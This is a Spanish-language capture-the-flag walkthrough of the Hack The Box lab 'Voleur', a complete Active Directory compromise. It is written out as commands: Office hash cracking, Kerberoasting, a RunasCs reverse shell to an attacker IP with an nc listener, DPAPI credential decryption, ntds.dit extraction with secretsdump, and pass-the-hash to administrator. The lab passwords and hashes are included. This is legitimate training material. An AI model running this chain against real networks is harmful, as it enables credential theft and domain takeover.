Voleur

Info:

As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: 
ryan.naylor / HollowOct31Nyt

Enumeración:

   1   │ # Nmap 7.95 scan initiated Sun Jul  6 16:49:31 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p53,88,135,139,389,445,464,593,636,2222,3268,3269,5985,9
       │ 389,49664,49668,60635,61466,61467,61469,61495 -oN targeted 10.10.11.76
   2   │ Nmap scan report for 10.10.11.76
   3   │ Host is up (0.43s latency).
   4   │ 
   5   │ PORT      STATE SERVICE       VERSION
   6   │ 53/tcp    open  domain        Simple DNS Plus
   7   │ 88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 22:49:41Z)
   8   │ 135/tcp   open  msrpc         Microsoft Windows RPC
   9   │ 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
  10   │ 389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
  11   │ 445/tcp   open  microsoft-ds?
  12   │ 464/tcp   open  kpasswd5?
  13   │ 593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  14   │ 636/tcp   open  tcpwrapped
  15   │ 2222/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
  16   │ | ssh-hostkey: 
  17   │ |   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
  18   │ |   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
  19   │ |_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
  20   │ 3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
  21   │ 3269/tcp  open  tcpwrapped
  22   │ 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  23   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  24   │ |_http-title: Not Found
  25   │ 9389/tcp  open  mc-nmf        .NET Message Framing
  26   │ 49664/tcp open  msrpc         Microsoft Windows RPC
  27   │ 49668/tcp open  msrpc         Microsoft Windows RPC
  28   │ 60635/tcp open  msrpc         Microsoft Windows RPC
  29   │ 61466/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  30   │ 61467/tcp open  msrpc         Microsoft Windows RPC
  31   │ 61469/tcp open  msrpc         Microsoft Windows RPC
  32   │ 61495/tcp open  msrpc         Microsoft Windows RPC
  33   │ Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
  34   │ 
  35   │ Host script results:
  36   │ | smb2-security-mode: 
  37   │ |   3:1:1: 
  38   │ |_    Message signing enabled and required
  39   │ |_clock-skew: 8h00m00s
  40   │ | smb2-time: 
  41   │ |   date: 2025-07-06T22:50:39
  42   │ |_  start_date: N/A
  43   │ 
  44   │ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  45   │ # Nmap done at Sun Jul  6 16:51:22 2025 -- 1 IP address (1 host up) scanned in 111.32 seconds

Configuramos todo ante todo:

/etc/krb5.conf

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

10.10.11.76 dc.voleur.htb VOLEUR.HTB

Al principio, netexec smb intentaba acceder al servidor SMB (DC.VOLEUR.HTB) usando las credenciales de ryan.naylor, pero no habías generado un TGT. Como resultado, no pudiste autenticarte correctamente y el acceso fue denegado.

TGT for the user

getTGT.py -dc-ip 10.10.11.76 'VOLEUR.HTB/ryan.naylor:HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache

El TGT permitió la autenticación Kerberos: Con el TGT generado, Kerberos ahora pudo autenticarte correctamente cuando ejecutaste el comando netexec smb, y te permitió acceder y enumerar los recursos SMB sin el error anterior.

netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares

En un principio no se pudo "error NT_STATUS_NOT_SUPPORTED "que estás viendo al intentar acceder al recurso SMB IT usando smbclient

Se arreglo usando:

Conexión con Kerberos a través de `smbclient.py`:

KRB5CCNAME=ryan.naylor.ccache smbclient.py -k DC.VOLEUR.HTB

Navegar a un recurso compartido específico:

use IT
cd First-Line Support

Al intentar abrir el .xlsx nos pide un passwd:

Extraer el hash del archivo con office2john:

office2john Access_Review.xlsx > hash.txt

Crackear el hash con john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Una vez abierto el .xlsx se encontraron muchas cosas:

Ahora que tienes la contraseña NightT1meP1dg3on14 para el usuario Todd.Wolfe.

Ejecutamos bloodhound-python con las credenciales de Ryan Naylor para recopilar todos los datos de Active Directory del dominio VOLEUR.HTB, utilizando Kerberos y generando un informe comprimido.

bloodhound-python -d VOLEUR.HTB -u 'ryan.naylor'  -p 'HollowOct31Nyt' -c all -ns 10.10.11.76 --zip

Acceso Directo con las Credenciales de svc_ldap que se encontro en xlsx:

getTGT.py -dc-ip 10.10.11.76 'VOLEUR.HTB/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache

Que ocurre si se tiene `WriteSPN` y se usa:

El atacante registra un SPN malicioso para un servicio.
Luego solicita un TGS para ese servicio con el SPN registrado.
Realiza un ataque Kerberoast para obtener el hash de la contraseña asociado con el SPN.
Si el ataque tiene éxito, el atacante obtiene la contraseña del servicio y puede usarla para escalar privilegios o comprometer más recursos en la red.

Crackear los hashes de Kerberos con John the Ripper:

Primero, usaste John the Ripper para crackear el hash de Kerberos de svc_winrm utilizando la wordlist RockYou.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes_kerberos.txt

Esto permitió obtener la contraseña de svc_winrm:

svc_winrm   |  AFireInsidedeOzarctica980219afi

Generar el TGT para svc_winrm:

getTGT.py -dc-ip 10.10.11.76 'VOLEUR.HTB/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=svc_winrm.ccache

Ingresamos por wrm:

Acceder a `svc_ldap` en el grupo `RESTORE_USERS`

Sabemos que el usuario svc_ldap está en el grupo RESTORE_USERS. Este grupo permite restaurar objetos de usuario eliminados en Active Directory. Ahora, el siguiente paso es ganar acceso al usuario svc_ldap.

Para ello descagamos:

RunasCs.exe

Release RunasCs version 1.5 · antonioCoco/RunasCsGitHub

.\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn cmd.exe -r 10.10.16.94:4444 
nc -lvnp 4444

Y tenemos acceso al usuario svc_ldap :

Hacer un cambio a Powershell

powershell

Consultar objetos de usuario eliminados en Active Directory

Ahora que tienes una shell con privilegios elevados, puedes buscar objetos de usuarios eliminados en Active Directory. Usa este comando de PowerShell para obtener los ObjectGUIDs, SIDs y últimas unidades organizativas de los usuarios eliminados:

Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

Restaurar el objeto de usuario de `todd.wolfe`

Después de obtener el ObjectGUID de todd.wolfe (usuario eliminado), puedes restaurarlo con el siguiente comando:

Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

Confirmar que todd.wolfe ha sido restaurado

net user /domain

Una vez recuperado el usuario y teniendo su contraseña entramos a ver sus archivos compartidos:

Sacamos el TGT para el usuario recuperado:

getTGT.py -dc-ip 10.10.11.76 'VOLEUR.HTB/todd.wolfe:NightT1meP1dg3on14'
export KRB5CCNAME=todd.wolfe.ccache

Entramos a ver los compartidos:

netexec smb DC.VOLEUR.HTB -u todd.wolfe@VOLEUR.HTB -p 'NightT1meP1dg3on14' -k --shares

Ahora si:

KRB5CCNAME=todd.wolfe.ccache smbclient.py -k DC.VOLEUR.HTB
-------------------------------------------------------------
smbclient //DC.VOLEUR.HTB/IT -U 'todd.wolfe@VOLEUR.HTB'
password:*********

Descargamos los dos archivos interesantes:

mget "AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3"
mget "AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88"

Pasos para continuar con el descifrado DPAPI:

Decrytar el archivo de la masterkey:

El archivo 08949382-134f-4c63-b93c-ce52efc0aa88 es el masterkey de Todd Wolfe. Usarás este archivo junto con el SID y la contraseña de Todd Wolfe para descifrar la clave maestra de DPAPI.

Ejecuta el siguiente comando para descifrar la masterkey:

dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14

Decrytar el archivo de credenciales:

El archivo 772275FAD58525253490A9B0039791D3 es el archivo de credenciales de Todd Wolfe. Usando la clave maestra obtenida del paso anterior, ahora podrás descifrar el archivo de credenciales.

Ejecuta el siguiente comando para descifrar el archivo de credenciales:

dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Esto debería proporcionarte las credenciales descifradas de Todd Wolfe.

Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m

Generar Kerberos TGT para `jeremy.combs`

getTGT.py -dc-ip 10.10.11.76 'VOLEUR.HTB/jeremy.combs:qT3V9pLXyN7W4m'
export KRB5CCNAME=jeremy.combs.ccache

De igual manera accedemos a los recursos compartidos:

netexec smb DC.VOLEUR.HTB -u jeremy.combs@VOLEUR.HTB -p 'qT3V9pLXyN7W4m' -k --shares

Entramos al directorio IT:

smbclient //DC.VOLEUR.HTB/IT -U 'jeremy.combs@VOLEUR.HTB'

Descagamos la id_rsa
Descargamos note.txt

La nota nos indica que podemos ingrear a un linux:

Conectar via SSH con el usuario `svc_backup`

Finalmente, usamos SSH para conectarnos al servidor voleur.htb en el puerto 2222 con la clave privada id_rsa para el usuario svc_backup:

ssh svc_backup@voleur.htb -p 2222 -i id_rsa

Listar los contenidos de las carpetas Active Directory y registry dentro de la carpeta Backups de Third-Line Support

ls '/mnt/c/IT/Third-Line Support/Backups/Active Directory'
ls '/mnt/c/IT/Third-Line Support/Backups/registry'

Copiar todos los archivos de Active Directory y registry a la máquina local utilizando SCP

scp -P 2222 -i id_rsa "svc_backup@voleur.htb:/mnt/c/IT/Third-Line Support/Backups/Active Directory/*" ./

Para los archivos en la carpeta registry:

scp -P 2222 -i id_rsa "svc_backup@voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/*" ./

Una vez copiado:

Ejecutar secretsdump.py para extraer los hashes:

Ahora, necesitas secretsdump.py para extraer los hashes de las contraseñas de los usuarios de Active Directory utilizando los archivos SYSTEM y ntds.dit que copiaste.

Para hacerlo, ejecuta el siguiente comando en tu terminal:

secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

-system SYSTEM: Especifica el archivo SYSTEM.
-ntds ntds.dit: Especifica el archivo ntds.dit, que contiene las contraseñas de los usuarios.
LOCAL: Le indica a secretsdump.py que está trabajando de manera local.

Generar el Kerberos TGT para `administrator` utilizando el hash NTLM:

getTGT.py -hashes :e656e07c56d831611b577b160b259ad2 -dc-ip 10.10.11.76 voleur.htb/administrator

export KRB5CCNAME=administrator.ccache

Conectar usando evil-winrm con autenticación Kerberos:

evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

PreviousRustyKey 389 NextMailing

Last updated 7 months ago

hashtagTGT for the user

hashtagConexión con Kerberos a través de smbclient.py:

hashtagQue ocurre si se tiene WriteSPN y se usa:

hashtagAcceder a svc_ldap en el grupo RESTORE_USERS

hashtagRunasCs.exe

hashtagHacer un cambio a Powershell

hashtagConsultar objetos de usuario eliminados en Active Directory

hashtagRestaurar el objeto de usuario de todd.wolfe

hashtagPasos para continuar con el descifrado DPAPI:

hashtagGenerar Kerberos TGT para jeremy.combs

hashtagConectar via SSH con el usuario svc_backup

hashtagGenerar el Kerberos TGT para administrator utilizando el hash NTLM: